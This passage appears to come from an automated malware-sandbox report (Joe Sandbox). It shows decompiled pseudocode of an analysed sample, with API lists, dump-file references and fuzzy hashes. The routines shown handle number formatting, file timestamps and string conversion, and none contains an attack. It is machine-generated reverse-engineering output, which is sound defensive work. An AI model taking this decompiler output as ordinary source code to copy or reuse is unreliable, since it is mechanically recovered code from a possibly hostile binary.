								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00CDEE10( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xce52a1
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00CDFFF0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00CDEE10( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00CF2260();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00CF2260();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00CF2260();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00CE9D21(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00CF2430(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00CE91A8();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00CE9087();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                                                    0x00ce9a1e
                                                    0x00ce9a29
                                                    0x00ce9a30
                                                    0x00ce9a32
                                                    0x00ce9a32
                                                    0x00ce9a34
                                                    0x00ce9a3d
                                                    0x00ce9a3f
                                                    0x00ce9a44
                                                    0x00ce9a4a
                                                    0x00ce9a60
                                                    0x00ce9a65
                                                    0x00ce9a68
                                                    0x00ce9a75
                                                    0x00ce9a7a
                                                    0x00ce9ace
                                                    0x00ce9ad6
                                                    0x00ce9ad8
                                                    0x00ce9ada
                                                    0x00ce9add
                                                    0x00ce9add
                                                    0x00ce9add
                                                    0x00ce9ae3
                                                    0x00ce9aeb
                                                    0x00ce9afe
                                                    0x00ce9b01
                                                    0x00ce9b03
                                                    0x00ce9b06
                                                    0x00ce9b07
                                                    0x00ce9b28
                                                    0x00ce9b2b
                                                    0x00ce9b2b
                                                    0x00ce9b09
                                                    0x00ce9b09
                                                    0x00ce9b0b
                                                    0x00ce9b16
                                                    0x00ce9b16
                                                    0x00ce9b18
                                                    0x00ce9b1f
                                                    0x00ce9b1a
                                                    0x00ce9b1a
                                                    0x00ce9b1a
                                                    0x00ce9b18
                                                    0x00ce9b2c
                                                    0x00ce9b2e
                                                    0x00ce9b2f
                                                    0x00ce9b32
                                                    0x00ce9b34
                                                    0x00ce9b48
                                                    0x00ce9b36
                                                    0x00ce9b36
                                                    0x00ce9b36
                                                    0x00ce9b4d
                                                    0x00ce9b4d
                                                    0x00ce9b52
                                                    0x00ce9b55
                                                    0x00ce9b60
                                                    0x00ce9b60
                                                    0x00ce9b60
                                                    0x00ce9b60
                                                    0x00ce9b64
                                                    0x00ce9b6b
                                                    0x00ce9b6c
                                                    0x00ce9b6f
                                                    0x00ce9b72
                                                    0x00ce9b72
                                                    0x00ce9b74
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce9b8c
                                                    0x00ce9b93
                                                    0x00ce9b97
                                                    0x00ce9b9a
                                                    0x00ce9b9d
                                                    0x00ce9b9f
                                                    0x00ce9b9f
                                                    0x00ce9b9f
                                                    0x00ce9ba1
                                                    0x00ce9ba4
                                                    0x00ce9ba7
                                                    0x00ce9ba9
                                                    0x00ce9bb1
                                                    0x00ce9bb7
                                                    0x00ce9bba
                                                    0x00ce9bbd
                                                    0x00ce9bbe
                                                    0x00ce9bc1
                                                    0x00ce9bc4
                                                    0x00ce9bc4
                                                    0x00ce9bc9
                                                    0x00ce9bcc
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce9be4
                                                    0x00ce9be9
                                                    0x00ce9bed
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce9bf1
                                                    0x00ce9bf1
                                                    0x00ce9bf4
                                                    0x00ce9bf5
                                                    0x00ce9bf5
                                                    0x00ce9bf7
                                                    0x00ce9bfa
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce9bfc
                                                    0x00ce9bff
                                                    0x00ce9c06
                                                    0x00ce9c09
                                                    0x00ce9c0c
                                                    0x00ce9c22
                                                    0x00ce9c22
                                                    0x00ce9c22
                                                    0x00ce9c0e
                                                    0x00ce9c0e
                                                    0x00ce9c10
                                                    0x00ce9c13
                                                    0x00ce9c1e
                                                    0x00ce9c15
                                                    0x00ce9c18
                                                    0x00ce9c18
                                                    0x00ce9c13
                                                    0x00000000
                                                    0x00ce9c0c
                                                    0x00ce9c01
                                                    0x00ce9c01
                                                    0x00ce9c03
                                                    0x00ce9c03
                                                    0x00ce9b57
                                                    0x00ce9b57
                                                    0x00ce9b5a
                                                    0x00ce9c25
                                                    0x00ce9c25
                                                    0x00ce9c27
                                                    0x00ce9c29
                                                    0x00ce9c2c
                                                    0x00ce9c2d
                                                    0x00ce9c2e
                                                    0x00ce9c2f
                                                    0x00ce9c37
                                                    0x00ce9c37
                                                    0x00ce9c37
                                                    0x00ce9c39
                                                    0x00ce9c3c
                                                    0x00ce9c3f
                                                    0x00ce9c41
                                                    0x00ce9c41
                                                    0x00ce9c43
                                                    0x00ce9c55
                                                    0x00ce9c59
                                                    0x00ce9c5c
                                                    0x00ce9c63
                                                    0x00ce9c6b
                                                    0x00ce9c6b
                                                    0x00ce9c6e
                                                    0x00ce9c70
                                                    0x00ce9c81
                                                    0x00ce9c81
                                                    0x00ce9c85
                                                    0x00ce9c85
                                                    0x00ce9c88
                                                    0x00ce9c8a
                                                    0x00ce9c8d
                                                    0x00000000
                                                    0x00ce9c72
                                                    0x00ce9c72
                                                    0x00ce9c78
                                                    0x00ce9c78
                                                    0x00ce9c7c
                                                    0x00ce9c8f
                                                    0x00ce9c8f
                                                    0x00ce9c93
                                                    0x00ce9c94
                                                    0x00ce9c96
                                                    0x00ce9c98
                                                    0x00ce9cd9
                                                    0x00ce9cd9
                                                    0x00ce9cdb
                                                    0x00ce9ce8
                                                    0x00ce9ce8
                                                    0x00ce9cea
                                                    0x00ce9cec
                                                    0x00ce9ced
                                                    0x00ce9cee
                                                    0x00ce9cf5
                                                    0x00ce9cf8
                                                    0x00ce9cfa
                                                    0x00ce9cfa
                                                    0x00ce9cfb
                                                    0x00ce9cfd
                                                    0x00ce9d00
                                                    0x00ce9d00
                                                    0x00ce9d02
                                                    0x00ce9d04
                                                    0x00000000
                                                    0x00ce9d04
                                                    0x00ce9cdd
                                                    0x00ce9cdf
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce9ce1
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce9ce3
                                                    0x00ce9ce6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce9ce6
                                                    0x00ce9c9f
                                                    0x00ce9ca5
                                                    0x00ce9ca5
                                                    0x00ce9ca7
                                                    0x00ce9ca8
                                                    0x00ce9ca9
                                                    0x00ce9caa
                                                    0x00ce9cb1
                                                    0x00ce9cb4
                                                    0x00ce9cb6
                                                    0x00ce9cb7
                                                    0x00ce9cb9
                                                    0x00ce9cc6
                                                    0x00ce9cc6
                                                    0x00ce9cc8
                                                    0x00ce9cca
                                                    0x00ce9ccb
                                                    0x00ce9ccc
                                                    0x00ce9cd3
                                                    0x00ce9cd6
                                                    0x00ce9cd8
                                                    0x00ce9cd8
                                                    0x00000000
                                                    0x00ce9cd8
                                                    0x00ce9cbb
                                                    0x00ce9cbb
                                                    0x00ce9cbd
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce9cbf
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce9cc1
                                                    0x00ce9cc4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce9cc4
                                                    0x00ce9ca1
                                                    0x00ce9ca3
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce9ca3
                                                    0x00ce9c74
                                                    0x00ce9c76
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce9c76
                                                    0x00ce9c70
                                                    0x00000000
                                                    0x00ce9b5a
                                                    0x00ce9b55
                                                    0x00ce9a7c
                                                    0x00ce9a7e
                                                    0x00000000
                                                    0x00ce9a80
                                                    0x00ce9a96
                                                    0x00ce9a9b
                                                    0x00ce9a9d
                                                    0x00ce9aa9
                                                    0x00ce9aaf
                                                    0x00ce9ab0
                                                    0x00ce9ab2
                                                    0x00ce9ab4
                                                    0x00ce9abf
                                                    0x00ce9abf
                                                    0x00ce9ac2
                                                    0x00ce9ac4
                                                    0x00ce9ac4
                                                    0x00ce9ac7
                                                    0x00ce9a9f
                                                    0x00ce9a9f
                                                    0x00ce9a9f
                                                    0x00000000
                                                    0x00ce9a9d
                                                    0x00ce9a4c
                                                    0x00ce9a4c
                                                    0x00ce9a53
                                                    0x00ce9a54
                                                    0x00ce9a56
                                                    0x00ce9d08
                                                    0x00ce9d0c
                                                    0x00ce9d11
                                                    0x00ce9d11
                                                    0x00ce9d20
                                                    0x00ce9d20

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: __alldvrm$_strrchr
                                                    • String ID:
                                                    • API String ID: 1036877536-0
                                                    • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                    • Instruction ID: dca5b8bada69054903b2213cd211d64a7f997d63a332122d50bb88e43033809f
                                                    • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                    • Instruction Fuzzy Hash: 19A17A72A007C69FEB21DF2AC8817BEBBE5EF55310F2841ADE5959B381C2388E41C751
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E00CCA354(void* __edx) {
				signed char _t41;
				void* _t42;
				void* _t53;
				signed char _t70;
				void* _t78;
				signed int* _t79;
				signed int* _t80;
				void* _t81;
				signed int* _t82;
				void* _t83;

				_t78 = __edx;
				E00CDEC50(0x1024);
				_t80 =  *(_t83 + 0x1038);
				_t70 = 1;
				if(_t80 == 0) {
					L2:
					 *(_t83 + 0x11) = 0;
					L3:
					_t79 =  *(_t83 + 0x1040);
					if(_t79 == 0) {
						L5:
						 *(_t83 + 0x13) = 0;
						L6:
						_t82 =  *(_t83 + 0x1044);
						if(_t82 == 0) {
							L8:
							 *(_t83 + 0x12) = 0;
							L9:
							_t41 = E00CCA243( *(_t83 + 0x1038));
							 *(_t83 + 0x18) = _t41;
							if(_t41 == 0xffffffff || (_t70 & _t41) == 0) {
								_t70 = 0;
							} else {
								E00CCA4ED( *((intOrPtr*)(_t83 + 0x103c)), 0);
							}
							_t42 = CreateFileW( *(_t83 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t83 + 0x14) = _t42;
							if(_t42 != 0xffffffff) {
								L16:
								if( *(_t83 + 0x11) != 0) {
									E00CD138A(_t80, _t78, _t83 + 0x1c);
								}
								if( *(_t83 + 0x13) != 0) {
									E00CD138A(_t79, _t78, _t83 + 0x2c);
								}
								if( *(_t83 + 0x12) != 0) {
									E00CD138A(_t82, _t78, _t83 + 0x24);
								}
								_t81 =  *(_t83 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t81,  ~( *(_t83 + 0x1b) & 0x000000ff) & _t83 + 0x00000030,  ~( *(_t83 + 0x16) & 0x000000ff) & _t83 + 0x00000024,  ~( *(_t83 + 0x11) & 0x000000ff) & _t83 + 0x0000001c);
								_t53 = CloseHandle(_t81);
								if(_t70 != 0) {
									_t53 = E00CCA4ED( *((intOrPtr*)(_t83 + 0x103c)),  *(_t83 + 0x18));
								}
								goto L24;
							} else {
								_t53 = E00CCBB03( *(_t83 + 0x1040), _t83 + 0x38, 0x800);
								if(_t53 == 0) {
									L24:
									return _t53;
								}
								_t53 = CreateFileW(_t83 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t83 + 0x14) = _t53;
								if(_t53 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t83 + 0x12) = _t70;
						if(( *_t82 | _t82[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t83 + 0x13) = _t70;
					if(( *_t79 | _t79[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t83 + 0x11) = 1;
				if(( *_t80 | _t80[1]) != 0) {
					goto L3;
				}
				goto L2;
			}













                                                    0x00cca354
                                                    0x00cca359
                                                    0x00cca365
                                                    0x00cca36c
                                                    0x00cca370
                                                    0x00cca37d
                                                    0x00cca37d
                                                    0x00cca381
                                                    0x00cca381
                                                    0x00cca38a
                                                    0x00cca397
                                                    0x00cca397
                                                    0x00cca39b
                                                    0x00cca39b
                                                    0x00cca3a4
                                                    0x00cca3b2
                                                    0x00cca3b2
                                                    0x00cca3b6
                                                    0x00cca3bd
                                                    0x00cca3c2
                                                    0x00cca3c9
                                                    0x00cca3df
                                                    0x00cca3cf
                                                    0x00cca3d8
                                                    0x00cca3d8
                                                    0x00cca3fa
                                                    0x00cca400
                                                    0x00cca407
                                                    0x00cca451
                                                    0x00cca456
                                                    0x00cca45f
                                                    0x00cca45f
                                                    0x00cca469
                                                    0x00cca472
                                                    0x00cca472
                                                    0x00cca47c
                                                    0x00cca485
                                                    0x00cca485
                                                    0x00cca495
                                                    0x00cca499
                                                    0x00cca4a9
                                                    0x00cca4b9
                                                    0x00cca4bf
                                                    0x00cca4c6
                                                    0x00cca4ce
                                                    0x00cca4db
                                                    0x00cca4db
                                                    0x00000000
                                                    0x00cca409
                                                    0x00cca41a
                                                    0x00cca421
                                                    0x00cca4e4
                                                    0x00cca4ea
                                                    0x00cca4ea
                                                    0x00cca43e
                                                    0x00cca444
                                                    0x00cca44b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cca44b
                                                    0x00cca407
                                                    0x00cca3ac
                                                    0x00cca3b0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cca3b0
                                                    0x00cca391
                                                    0x00cca395
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cca395
                                                    0x00cca377
                                                    0x00cca37b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00CC7F69,?,?,?), ref: 00CCA3FA
                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00CC7F69,?), ref: 00CCA43E
                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00CC7F69,?,?,?,?,?,?,?), ref: 00CCA4BF
                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00CC7F69,?,?,?,?,?,?,?,?,?,?), ref: 00CCA4C6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: File$Create$CloseHandleTime
                                                    • String ID:
                                                    • API String ID: 2287278272-0
                                                    • Opcode ID: 08874bec49adb39a966ae173e9193d0d70c43383cd723800554ec9062d185f1a
                                                    • Instruction ID: b1df3c4c68b0fd447dfe45b1e300c41e6a941d0b59d2329ee5f79b29230e6cee
                                                    • Opcode Fuzzy Hash: 08874bec49adb39a966ae173e9193d0d70c43383cd723800554ec9062d185f1a
                                                    • Instruction Fuzzy Hash: AD41CF31248385AAD725DF24DC59FAEBBE4AB84308F08491DF5E1D3190D6A4DB48DB53
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 52%
                                                    			E00CC1100(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v60;
				short* _v64;
				char* _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				char _v1114;
				char _v1116;
				void* __edi;
				signed int _t44;
				signed int _t52;
				intOrPtr _t67;
				short* _t80;
				void* _t83;
				char _t84;
				signed int _t85;
				void* _t87;
				signed int _t97;

				_t79 = _a16;
				_t81 =  &_v1116;
				if(_a16 != 0) {
					E00CD0602( &_v1116, _t79, 0x200);
					_t87 =  &_v1114 + E00CE3E13( &_v1116) * 2;
					E00CD0602(_t87, _t79, 0x200 - (_t87 -  &_v1116 >> 1));
					_t81 = _t87 + E00CE3E13(_t87) * 2 + 2;
				}
				E00CD0602(_t81, E00CCE617(0xa3), 0x200 - (_t81 -  &_v1116 >> 1));
				_t83 = _t81 + E00CE3E13(_t81) * 2 + 2;
				E00CD0602(_t83, 0xcf35f0, 0x200 - (_t83 -  &_v1116 >> 1));
				_t44 = E00CE3E13(_t83);
				 *((short*)(_t83 + 2 + _t44 * 2)) = 0;
				_t84 = 0x58;
				E00CDFFF0(_t79,  &_v92, 0, _t84);
				_t67 = _a20;
				_t80 = _a12;
				_v88 = _a4;
				_v84 =  *0xd01028;
				_v80 =  &_v1116;
				_v44 = _a8;
				_v92 = _t84;
				_v64 = _t80;
				_v60 = 0x800;
				_v40 = 0x1080c;
				_push( &_v92);
				if(_t67 == 0) {
					_t52 =  *0xd23044();
				} else {
					_t52 =  *0xd2303c();
				}
				_t85 = _t52;
				if(_t85 == 0) {
					_t52 =  *0xd23040();
					if(_t52 == 0x3002) {
						 *_t80 = 0;
						_push( &_v92);
						if(_t67 == 0) {
							_t52 =  *0xd23044();
						} else {
							_t52 =  *0xd2303c();
						}
						_t85 = _t52;
					}
					_t97 = _t85;
				}
				return _t52 & 0xffffff00 | _t97 != 0x00000000;
			}























                                                    0x00cc110c
                                                    0x00cc110f
                                                    0x00cc111c
                                                    0x00cc1123
                                                    0x00cc1137
                                                    0x00cc114d
                                                    0x00cc115c
                                                    0x00cc115c
                                                    0x00cc117c
                                                    0x00cc1191
                                                    0x00cc11a3
                                                    0x00cc11a9
                                                    0x00cc11b2
                                                    0x00cc11ba
                                                    0x00cc11be
                                                    0x00cc11c9
                                                    0x00cc11cc
                                                    0x00cc11cf
                                                    0x00cc11d7
                                                    0x00cc11e0
                                                    0x00cc11e6
                                                    0x00cc11ec
                                                    0x00cc11ef
                                                    0x00cc11f2
                                                    0x00cc11f9
                                                    0x00cc1200
                                                    0x00cc1203
                                                    0x00cc120d
                                                    0x00cc1205
                                                    0x00cc1205
                                                    0x00cc1205
                                                    0x00cc1213
                                                    0x00cc1217
                                                    0x00cc1219
                                                    0x00cc1224
                                                    0x00cc1228
                                                    0x00cc122e
                                                    0x00cc1231
                                                    0x00cc123b
                                                    0x00cc1233
                                                    0x00cc1233
                                                    0x00cc1233
                                                    0x00cc1241
                                                    0x00cc1241
                                                    0x00cc1243
                                                    0x00cc1243
                                                    0x00cc124c

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID:
                                                    • API String ID: 176396367-0
                                                    • Opcode ID: 710d379ad1e368a7edb72648b81cc88c6bae82f6e8e32f8c4b82747b300cb4d9
                                                    • Instruction ID: b9b616f0f9ff8281a280dc32e29f32a83e0f5995de22f371b5ead4d43faef219
                                                    • Opcode Fuzzy Hash: 710d379ad1e368a7edb72648b81cc88c6bae82f6e8e32f8c4b82747b300cb4d9
                                                    • Instruction Fuzzy Hash: 3E41B6719006699BCB259F69CD09AEE7BB8EF01311F04401EFD45F7341DB34AE458AB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CEC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E00CEC988(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t54;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t66;
				short* _t67;
				signed int _t68;
				short* _t69;

				_t65 = __edx;
				_t34 =  *0xcfe7ac; // 0x349e4b74
				_v8 = _t34 ^ _t68;
				E00CE4636(_t55,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x2de85006
					_t54 =  *_t6;
					_t57 = _t54;
					_a24 = _t54;
				}
				_t66 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E00CDFBBC(_t66, _t55, _v8 ^ _t68, _t65, _t66, _t67);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t67 = 0;
					L11:
					if(_t67 != 0) {
						E00CDFFF0(_t66, _t67, _t66, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t67, _v12);
						if(_t46 != 0) {
							_t66 = GetStringTypeW(_a8, _t67, _t46, _a20);
						}
					}
					L14:
					E00CEABC3(_t67);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t67 = E00CE8E06(_t63, _t48 & _t63);
					if(_t67 == 0) {
						goto L14;
					}
					 *_t67 = 0xdddd;
					L9:
					_t67 =  &(_t67[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00CF2010(_t48 & _t63);
				_t67 = _t69;
				if(_t67 == 0) {
					goto L14;
				}
				 *_t67 = 0xcccc;
				goto L9;
			}























                                                    0x00cec988
                                                    0x00cec990
                                                    0x00cec997
                                                    0x00cec9a3
                                                    0x00cec9a8
                                                    0x00cec9ad
                                                    0x00cec9b2
                                                    0x00cec9b2
                                                    0x00cec9b5
                                                    0x00cec9b7
                                                    0x00cec9b7
                                                    0x00cec9bc
                                                    0x00cec9d5
                                                    0x00cec9db
                                                    0x00cec9e0
                                                    0x00ceca7f
                                                    0x00ceca83
                                                    0x00ceca88
                                                    0x00ceca88
                                                    0x00cecaa4
                                                    0x00cecaa4
                                                    0x00cec9e6
                                                    0x00cec9ee
                                                    0x00cec9f2
                                                    0x00ceca3e
                                                    0x00ceca40
                                                    0x00ceca42
                                                    0x00ceca47
                                                    0x00ceca5e
                                                    0x00ceca66
                                                    0x00ceca76
                                                    0x00ceca76
                                                    0x00ceca66
                                                    0x00ceca78
                                                    0x00ceca79
                                                    0x00000000
                                                    0x00ceca7e
                                                    0x00cec9f9
                                                    0x00cec9fb
                                                    0x00cec9fd
                                                    0x00ceca05
                                                    0x00ceca22
                                                    0x00ceca2c
                                                    0x00ceca31
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceca33
